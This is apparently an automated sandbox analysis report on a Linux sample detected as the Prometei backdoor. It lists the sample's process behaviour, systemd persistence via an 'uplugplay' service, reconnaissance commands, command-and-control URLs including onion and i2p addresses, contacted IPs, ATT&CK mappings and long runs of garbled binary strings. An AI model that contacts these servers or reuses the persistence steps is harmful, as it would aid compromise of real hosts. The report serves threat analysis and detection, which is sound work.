Source: /bin/sh (PID: 5308)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5324)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 5332)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5284)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /usr/sbin/logrotate (PID: 5266)Shell command executed: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "Jump to behavior
Source: /usr/sbin/logrotate (PID: 5274)Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslogJump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5287)Shell command executed: sh -c "pgrep lHxDIlc6HU"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5291)Shell command executed: sh -c "pidof lHxDIlc6HU"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5295)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5299)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5303)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5307)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5312)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5331)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5335)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5347)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5351)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5355)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5359)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5363)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5367)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5371)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5375)Shell command executed: sh -c dmidecodeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5393)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5399)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5403)Shell command executed: sh -c "uname -a"Jump to behavior
Source: /bin/sh (PID: 5288)Pgrep executable: /usr/bin/pgrep -> pgrep lHxDIlc6HUJump to behavior
Source: /bin/sh (PID: 5296)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 5304)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/lHxDIlc6HU (PID: 5284)File: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/lHxDIlc6HU (PID: 5284)File: /tmp/lHxDIlc6HUJump to behavior
Source: /usr/bin/pgrep (PID: 5288)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5296)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5304)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5336)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5400)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/find (PID: 5246)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/lHxDIlc6HU (PID: 5284)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5333)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5336)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 5404)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/logrotate (PID: 5201)Truncated file: /var/log/cups/access_log.1Jump to behavior
Source: /usr/sbin/logrotate (PID: 5201)Truncated file: /var/log/syslog.1Jump to behavior
Source: /usr/bin/cat (PID: 5348)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: 5269.22.drBinary or memory string: -9915837702310A--gzvmware kernel module
Source: 5269.22.drBinary or memory string: -1116261022170A--gzQEMU User Emulator
Source: 5269.22.drBinary or memory string: qemu-or1k
Source: 5269.22.drBinary or memory string: qemu-riscv64
Source: 5269.22.drBinary or memory string: {cqemu
Source: 5269.22.drBinary or memory string: qemu-arm
Source: 5269.22.drBinary or memory string: (qemu
Source: 5269.22.drBinary or memory string: qemu-tilegx
Source: 5269.22.drBinary or memory string: qemu-hppa
Source: 5269.22.drBinary or memory string: q{rqemu%
Source: 5269.22.drBinary or memory string: )qemu
Source: 5269.22.drBinary or memory string: vmware-toolbox-cmd
Source: 5269.22.drBinary or memory string: qemu-ppc
Source: 5269.22.drBinary or memory string: Tqemu9
Source: 5269.22.drBinary or memory string: qemu-aarch64_be
Source: 5269.22.drBinary or memory string: 0qemu9
Source: 5269.22.drBinary or memory string: qemu-sparc64
Source: 5269.22.drBinary or memory string: qemu-mips64
Source: 5269.22.drBinary or memory string: vV:qemu9
Source: 5269.22.drBinary or memory string: qemu-ppc64le
Source: 5269.22.drBinary or memory string: <glib::param::uint64Glib::Param::UInt643pm315820097650A--gzWrapper for uint64 parameters in GLibx86_64-linux-gnu-ld.gold-1116112426130B--gzThe GNU ELF linkerprinter-profile-1115804162510A--gzProfile using X-Rite ColorMunki and Argyll CMSgrub-fstest-1116214898500A--gzdebug tool for GRUB filesystem driversxdg-user-dir-1115483406210A--gzFind an XDG user dirkmodsign-1115569251480A--gzKernel module signing toolsensible-editor-1115739932820A--gzsensible editing, paging, and web browsingminesMines6615854478170Cgnome-mines-gzinputattach-1115708189280A--gzattach a serial line to an input-layer devicegapplication-1116155671180A--gzD-Bus application launcherip-tunnel-8815816145190A--gztunnel configurationkoi8rxterm-1116140167530A--gzX terminal emulator for KOI8-R environmentsfoo2hiperc-wrapper-1115804162510A-tgzConvert Postscript into a HIPERC printer streamcryptsetup-reencrypt-8816002888050A--gztool for offline LUKS device re-encryptionsyndaemon-1115861716810A--gza program that monitors keyboard activity and disables the touchpad when the keyboard is being used.gslj-1115980290200B--gzFormat and print text for LaserJet printer using ghostscriptfile2brl-1115757179490A--gzTranslate an xml or a text file into an embosser-ready braille filexfdesktop-settings-1115793419820A--gzDesktop settings for Xfceua-1115856013570B--gzManage Ubuntu Advantage services from Canonicallatin4-7715812813670B--gzISO 8859-4 character set encoded in octal, decimal, and hexadecimalsane-genesys-5516003468200A--gzSANE backend for GL646, GL841, GL843, GL847 and GL124 based USB flatbed scannerspdftohtml-1115853266670A--gzprogram to convert PDF files into HTML, XML and PNG imagesbluetooth-sendto-1116015653360A--gzGTK application for transferring files over Bluetoothqemu-ppc64-1116261022170B--gzQEMU User Emulatorcache_metadata_size-8815811608350A--gzEstimate the size of the metadata device needed for a given configuration.net::dbus::exporterNet::DBus::Exporter3pm315773746310A--gzExport object methods and signals to the bussane-pint-5516003468200A--gzSANE backend for scanners that use the PINT device driverbpf-helpers7-7715812813670A--gzlist of eBPF helper functionsfull-4415812813670A--gzalways full devicelogin-1115906478670A--gzbegin session on the systemcups-snmp-8815877390340A--gzcups snmp backend (deprecated)ordchr-3am315728089600A--gzconvert characters to strings and vice versasosreport-1116092694050A--gzCollect and package diagnostic and support datatop-1115827827270A--gzdisplay Linux processesuri::_punycodeURI::_punycode3pm315811897880A--gzencodes Unicode string in Punycodettytty4tty1systemd-localed-8816268940210B--gzLocale bus mechanismlvmsadc-8815816289110
Source: 5269.22.drBinary or memory string: vmware
Source: 5269.22.drBinary or memory string: qemu-cris
Source: 5269.22.drBinary or memory string: libvmtools
Source: 5269.22.drBinary or memory string: qemu-m68k
Source: 5269.22.drBinary or memory string: qemu-xtensa
Source: 5269.22.drBinary or memory string: 9qemu
Source: 5269.22.drBinary or memory string: qemu-sh4
Source: 5269.22.drBinary or memory string: Dprezip-bin-1116269780060A--gzprefix zip delta word list compressor/decompressornameif-8815490444730A--gzname network interfaces based on MAC addressesxdg-user-dirs-update-1115483406210A--gzUpdate XDG user dir configurationip-link-8815816145190A--gznetwork device configurationhpsa-4415812813670A--gzHP Smart Array SCSI driverhd4-4415812813670A--gzMFM/IDE hard disk devicessane-canon630u-5516003468200A--gzSANE backend for the Canon 630u USB flatbed scannersg_copy_results-8815825816070A--gzsend SCSI RECEIVE COPY RESULTS command (XCOPY related)grub-macbless-8816214898500A--gzbless a mac file/directoryntfstruncate-8815568625640A-tgztruncate a file on an NTFS volumelessfile-1115936459130B--gz"input preprocessor" for less.sane-artec-5516003468200A--gzSANE backend for Artec flatbed scannersrmdir-1115676799200A--gzremove empty directoriessystemd-networkd-wait-online.service-8816268940210A--gzWait for network to come onlinemkfs.ntfs-8815568625640B-tgzcreate an NTFS file systemsg_inq-8815825816070A--gzissue SCSI INQUIRY command and/or decode its responseradattr.so-8815955079440Cpppd-radattr-gzc_rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valuestc-htb-8815816145190A--gzHierarchy Token Bucketgvfs-open-1115868766090A--gzsg_rbuf-8815825816070A--gzreads data using SCSI READ BUFFER commandglib-compile-schemas-1116155671180A--gzGSettings schema compileropenssl-srp-1ssl116164130370B--gzmaintain SRP password fileopenssl-rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valueslibvmtools-3315837702310A--gzvmware shared librarypasswd5-5515906478670A--gzthe password filenet::dbus::dumperNet::DBus::Dumper3pm315773746310A--gzStringify Net::DBus objects suitable for printingsane-hp4200-5516003468200A--gzSANE backend for Hewlett-Packard 4200 scannersposixoptions-7715812813670A--gzoptional parts of the POSIX standardnetworkmanager.confNetworkManager.conf5516002723180A--gzNetworkManager configuration fileownership-8815771238010A--gzCompaq ownership tag retrieveroakdecode-1115804162510A--gzDecode an OAKT printer stream into human readable form.gvfs-save-1115868766090A--gzmkfs.minix-8815953177680A--gzmake a Minix filesystemuri7-7715812813670A--gzuniform resource identifier (URI), including a URL or URNedit-1115714399500B--gzexecute programs via entries in the mailcap filegit-diff-files-1116148628880A--gzCompares files in the working tree and the index.ldaprc-5516136581350Cldap.conf-gzpactl-1116219586470A--gzControl a running PulseAudio sound servertempfile-1115756848240A--gzcreate a temporary file in a safe mannerhp-check-1115857238880A--gzDependency/Vers
Source: 5269.22.drBinary or memory string: .qemu{
Source: 5269.22.drBinary or memory string: qemu-ppc64abi32
Source: 5269.22.drBinary or memory string: qemu-ppc64
Source: 5269.22.drBinary or memory string: qemu-i386
Source: 5269.22.drBinary or memory string: qemu-x86_64
Source: 5269.22.drBinary or memory string: H~6\nqemu*q
Source: 5269.22.drBinary or memory string: @qemu
Source: 5269.22.drBinary or memory string: Fqqemu
Source: 5269.22.drBinary or memory string: N4qemu
Source: 5269.22.drBinary or memory string: ~6\nqemu*q
Source: 5269.22.drBinary or memory string: qemu-mips64el
Source: 5269.22.drBinary or memory string: hqemu
Source: 5269.22.drBinary or memory string: &mqemu
Source: 5269.22.drBinary or memory string: $qemu
Source: 5269.22.drBinary or memory string: qemu-sparc
Source: 5269.22.drBinary or memory string: qemu-microblaze
Source: 5269.22.drBinary or memory string: qemu-user
Source: 5269.22.drBinary or memory string: qemu-aarch64
Source: 5269.22.drBinary or memory string: qemu-sh4eb
Source: 5269.22.drBinary or memory string: iqemu
Source: 5269.22.drBinary or memory string: qemu-mipsel
Source: 5269.22.drBinary or memory string: qemuP`
Source: 5269.22.drBinary or memory string: qemu-alpha
Source: 5269.22.drBinary or memory string: qemu-microblazeel
Source: 5269.22.drBinary or memory string: \qemu
Source: 5269.22.drBinary or memory string: qemu-xtensaeb
Source: 5269.22.drBinary or memory string: qemu-mipsn32el
Source: 5269.22.drBinary or memory string: SAqemu
Source: 5269.22.drBinary or memory string: Vqemu
Source: 5269.22.drBinary or memory string: qemu-mipsn32
Source: 5269.22.drBinary or memory string: qemuAU
Source: 5269.22.drBinary or memory string: qemu-riscv32
Source: 5269.22.drBinary or memory string: qemu-sparc32plus
Source: 5269.22.drBinary or memory string: 7,qemu
Source: 5269.22.drBinary or memory string: qemu-s390x
Source: 5269.22.drBinary or memory string: vmware-checkvm
Source: 5269.22.drBinary or memory string: qemu-nios2
Source: 5269.22.drBinary or memory string: qemu-armeb
Source: 5269.22.drBinary or memory string: -4415868968400A--gzVMware SVGA video driver
Source: 5269.22.drBinary or memory string: 7xml::parser::style::streamXML::Parser::Style::Stream3pm315701248990A--gzStream style for XML::Parsersystemd-timedated-8816268940210B--gzTime and date bus mechanismxfce4-keyboard-settings-1115867081120A--gzKeyboard settings for Xfcepygettext2-1115841026830B--gzPython equivalent of xgettext(1)sudoedit-8816110660620B--gzexecute a command as another userintro7-7715812813670A--gzintroduction to overview and miscellany sectionsprof-1115812813670A--gzread and display shared object profiling datadhclient.conf-5516219398220A--gzDHCP client configuration filepam_group-8815953742440A--gzPAM module for group accesssystemd-ask-password-1116268940210A--gzQuery the user for a system passwordupdate-dictcommon-hunspell-8815422954860A--gzrebuild hunspell database and emacsen stuffqemu-nios2-1116261022170B--gzQEMU User Emulatorlwp::useragentLWP::UserAgent3pm315750405830A--gzWeb user agent classgpgcompose-1115838662460A--gzGenerate a stream of OpenPGP packetsecho-1115676799200A--gzdisplay a line of textio::socket::ssl::utilsIO::Socket::SSL::Utils3pm315817106800A--gz- loading, storing, creating certificates and keyscurl-1116268709580A--gztransfer a URLgetcap-8815819434600A--gzexamine file capabilitieszegrep-1115762517060B--gzsearch possibly compressed files for a regular expressiongrub-syslinux2cfg-1116214898500A--gztransform syslinux config into grub.cfgrtc-4415812813670A--gzreal-time clockglib::codegenGlib::CodeGen3pm315820097650A--gzcode generation utilities for Glib-based bindings.wpa_cli-8816146062790A--gzWPA command line clientiso_8859_3-7715812813670B--gzISO 8859-3 character set encoded in octal, decimal, and hexadecimaliso_8859-9-7715812813670A-tgzISO 8859-9 character set encoded in octal, decimal, and hexadecimallvextend-8815816289110A--gzAdd space to a logical volumeresolvectl-1116268940210A--gzResolve domain names, IPV4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS resolverchgrp-1115676799200A--gzchange group ownershipsystemd-cgls-1116268940210A--gzRecursively show control group contentspygettext3.8-1113852085880A--gzPython equivalent of xgettext(1)ping4-8815804258830B--gzsend ICMP ECHO_REQUEST to network hostsidmapwb-8816000845410A--gzwinbind ID mapping plugin for cifs-utilsapturl-gtk-8815799493830B--gzgraphical apt-protocol interpreting package installersane-epsonds-5516003468200A--gzSANE backend for EPSON ESC/I-2 scannersgvfs-monitor-file-1115868766090A--gzrstart-1115829564830A--gza sample implementation of a Remote Start clientgit-stage-1116148628880A--gzAdd file contents to the staging areatc-pedit-8815816145190A--gzgeneric packet editor actioniptables-save-881582899
Source: 5269.22.drBinary or memory string: I_qemu
Source: 5269.22.drBinary or memory string: -1116261022170B--gzQEMU User Emulator
Source: 5269.22.drBinary or memory string: -3315837702310A--gzvmware shared library
Source: 5269.22.drBinary or memory string: qemu-mips
Source: 5269.22.drBinary or memory string: qemuj\
Source: 5269.22.drBinary or memory string: {qemuQ&
Source: 5269.22.drBinary or memory string: Wgnome-text-editor-111629209547491759146B--gztext editor for the GNOME Desktopx11::protocol::connection::filehandleX11::Protocol::Connection::FileHandle3pm314314075500A--gzPerl module base class for FileHandle-based X11 connectionshtbHTB8815816145190Ctc-htb-gzcifscreds-1116000845410A--gzmanage NTLM credentials in kernel keyringiwconfig-8815490049440A--gzconfigure a wireless network interfaceossl_store-file-7ssl716164130370A--gzThe store 'file' scheme loadertc-stab-8815816145190A--gzGeneric size table manipulationsnotifier-7715877390340A--gzcups notification interfaceqemu-arm-1116261022170B--gzQEMU User EmulatorgemfileGemfile5516263767190Cgemfile2.7-gzglib::object::subclassGlib::Object::Subclass3pm315820097650A--gzregister a perl class as a GObject classnetcat-111612200165426646725B--gzarbitrary TCP and UDP connections and listensdpkg::changelog::parseDpkg::Changelog::Parse3perl315849439740A--gzgeneric changelog parser for dpkg-parsechangelogmpris-proxy-1116243432320A--gzBluetooth mpris-proxybundle-pristine2.7-1116263767190A--gzRestores installed gems to their pristine conditionfsck.ext3-8815816604980B--gzcheck a Linux ext2/ext3/ext4 file systemvolname-1115625752510A--gzreturn volume nameiso-8859-9-7715812813670B--gzISO 8859-9 character set encoded in octal, decimal, and hexadecimalheadhead1HEAD1psd-4415812813670A--gzdriver for SCSI disk driveschrt-1115953177680A--gzmanipulate the real-time attributes of a processvcs-4415812813670A--gzvirtual console memorygit-upload-archive-1116148628880A--gzSend archive back to git-archivenet::dbus::binding::message::errorNet::DBus::Binding::Message::Error3pm315773746310A--gza message encoding a method call errorpkcs11.conf-5516097870510A--gzConfiguration files for PKCS#11 modulessfill-1115227593860A--gzsecure free disk and inode space wiper (secure_deletion toolkit)ldattach-8815953177680A--gzattach a line discipline to a serial linethin_restore-8815811608350A--gzrestore thin provisioning metadata file to device or file.phar.phar7.4-1116254980150B--gzPHAR (PHP archive) command line toolbundle-outdated2.7-1116263767190A--gzList installed gems with newer versions availablemail::addressMail::Address3pm315640244160A--gzparse mail addressesopenssl-ca-1ssl116164130370B--gzsample minimal CA applicationchardet3-1115765858900A--gzuniversal character encoding detectorerb2.7-1116263767190A--gzRuby Templatingchktrust-1115826667350A--gzCheck the trust of a PE executable.sg_raw-8815825816070A--gzsend arbitrary SCSI command to a devicegvfs-trash-1115868766090A--gzintro1-1115812813670A--gzintroduction to user commandsmailcap-5515714399500A--gzmetamail capabilities filegigoloGigolo1gig
Source: 5269.22.drBinary or memory string: vmware-xferlogs
Source: /bin/sh (PID: 5404)Uname executable: /usr/bin/uname -> uname -aJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory4
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Indicator Removal on Host
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
Proxy
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
File Deletion
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 559893 Sample: lHxDIlc6HU Startdate: 26/01/2022 Architecture: LINUX Score: 64 96 p3.feefreepool.net 88.198.246.242, 41557, 56830, 56832 HETZNER-ASDE Germany 2->96 98 109.202.202.202, 80 INIT7CH Switzerland 2->98 100 2 other IPs or domains 2->100 102 Multi AV Scanner detection for submitted file 2->102 104 Found Tor onion address 2->104 106 Sample is packed with UPX 2->106 11 systemd mandb lHxDIlc6HU 2->11         started        15 systemd uplugplay 2->15         started        17 systemd logrotate 2->17         started        19 4 other processes 2->19 signatures3 process4 file5 94 /usr/sbin/uplugplay, ELF 11->94 dropped 108 Drops files in suspicious directories 11->108 110 Sample deletes itself 11->110 21 lHxDIlc6HU sh 11->21         started        23 lHxDIlc6HU sh 11->23         started        25 lHxDIlc6HU sh 11->25         started        37 5 other processes 11->37 27 uplugplay 15->27         started        29 logrotate sh 17->29         started        31 logrotate sh 17->31         started        33 logrotate gzip 17->33         started        35 logrotate gzip 17->35         started        signatures6 process7 process8 39 sh pgrep 21->39         started        41 sh pidof 23->41         started        43 sh pgrep 25->43         started        45 uplugplay sh 27->45         started        47 sh invoke-rc.d 29->47         started        49 sh rsyslog-rotate 31->49         started        51 sh pidof 37->51         started        53 sh pgrep 37->53         started        55 3 other processes 37->55 process9 57 sh uplugplay 45->57         started        60 invoke-rc.d runlevel 47->60         started        62 invoke-rc.d systemctl 47->62         started        64 invoke-rc.d ls 47->64         started        66 invoke-rc.d systemctl 47->66         started        68 rsyslog-rotate systemctl 49->68         started        file10 92 /etc/CommId, ASCII 57->92 dropped 70 uplugplay sh 57->70         started        72 uplugplay sh 57->72         started        74 uplugplay sh 57->74         started        76 8 other processes 57->76 process11 process12 78 sh cat 70->78         started        80 sh dmidecode 72->80         started        82 sh dmidecode 74->82         started        84 sh dmidecode 76->84         started        86 sh dmidecode 76->86         started        88 sh dmidecode 76->88         started        90 5 other processes 76->90
SourceDetectionScannerLabelLink
lHxDIlc6HU18%VirustotalBrowse
lHxDIlc6HU28%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
/usr/sbin/uplugplay28%ReversingLabsLinux.Backdoor.Prometei
No Antivirus matches
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z0%Avira URL Cloudsafe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://dummy.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Zfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rglHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netlHxDIlc6HU, uplugplay.40.drfalse
      high
      http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgilHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://p3.feefreepool.net/cgi-bin/prometei.cgilHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgilHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://dummy.zero/cgi-bin/prometei.cgilHxDIlc6HU, 5284.1.00000000a41ba199.00000000d55ef298.rw-.sdmptrue
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      88.198.246.242
      p3.feefreepool.netGermany
      24940HETZNER-ASDEtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      88.198.246.242PMidZ9jAKZGet hashmaliciousBrowse
      • p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
      zsvc.exeGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
      3V9alTXIliGet hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
      promet16Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
      promet15Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
      promet2Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
      EKbGofM1r6Get hashmaliciousBrowse
      • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
      109.202.202.202PMidZ9jAKZGet hashmaliciousBrowse
        atxhuaGet hashmaliciousBrowse
          cemtopGet hashmaliciousBrowse
            earyzqGet hashmaliciousBrowse
              fwdfvfGet hashmaliciousBrowse
                lnkfmxGet hashmaliciousBrowse
                  nvitpjGet hashmaliciousBrowse
                    qtmzbnGet hashmaliciousBrowse
                      qvmxvlGet hashmaliciousBrowse
                        razdznGet hashmaliciousBrowse
                          vtyhatGet hashmaliciousBrowse
                            vvglmaGet hashmaliciousBrowse
                              arcGet hashmaliciousBrowse
                                armGet hashmaliciousBrowse
                                  arm5Get hashmaliciousBrowse
                                    arm6Get hashmaliciousBrowse
                                      arm7Get hashmaliciousBrowse
                                        i586Get hashmaliciousBrowse
                                          i686Get hashmaliciousBrowse
                                            darm7Get hashmaliciousBrowse
                                              91.189.91.43PMidZ9jAKZGet hashmaliciousBrowse
                                                atxhuaGet hashmaliciousBrowse
                                                  cemtopGet hashmaliciousBrowse
                                                    earyzqGet hashmaliciousBrowse
                                                      fwdfvfGet hashmaliciousBrowse
                                                        lnkfmxGet hashmaliciousBrowse
                                                          nvitpjGet hashmaliciousBrowse
                                                            qtmzbnGet hashmaliciousBrowse
                                                              qvmxvlGet hashmaliciousBrowse
                                                                razdznGet hashmaliciousBrowse
                                                                  vtyhatGet hashmaliciousBrowse
                                                                    vvglmaGet hashmaliciousBrowse
                                                                      arcGet hashmaliciousBrowse
                                                                        armGet hashmaliciousBrowse
                                                                          arm5Get hashmaliciousBrowse
                                                                            arm6Get hashmaliciousBrowse
                                                                              arm7Get hashmaliciousBrowse
                                                                                i586Get hashmaliciousBrowse
                                                                                  i686Get hashmaliciousBrowse
                                                                                    darm7Get hashmaliciousBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      p3.feefreepool.netPMidZ9jAKZGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      HETZNER-ASDEPMidZ9jAKZGet hashmaliciousBrowse
                                                                                      • 88.198.246.242
                                                                                      FedEx Package.exeGet hashmaliciousBrowse
                                                                                      • 144.76.136.153
                                                                                      8sQIwmykhK.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      Loader.exeGet hashmaliciousBrowse
                                                                                      • 136.243.172.101
                                                                                      8q29ccl9udkb.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      zyxd7AEkBbQoGfYYyWw.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      MeA7.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      04KvoWMm7A.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      oIti9XVnG.dllGet hashmaliciousBrowse
                                                                                      • 178.63.25.185
                                                                                      gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      gAT2Oj3OTz.exeGet hashmaliciousBrowse
                                                                                      • 148.251.234.83
                                                                                      8yFmOmFwxN.dllGet hashmaliciousBrowse
                                                                                      • 78.47.204.80
                                                                                      dC8gRk0W3u.dllGet hashmaliciousBrowse
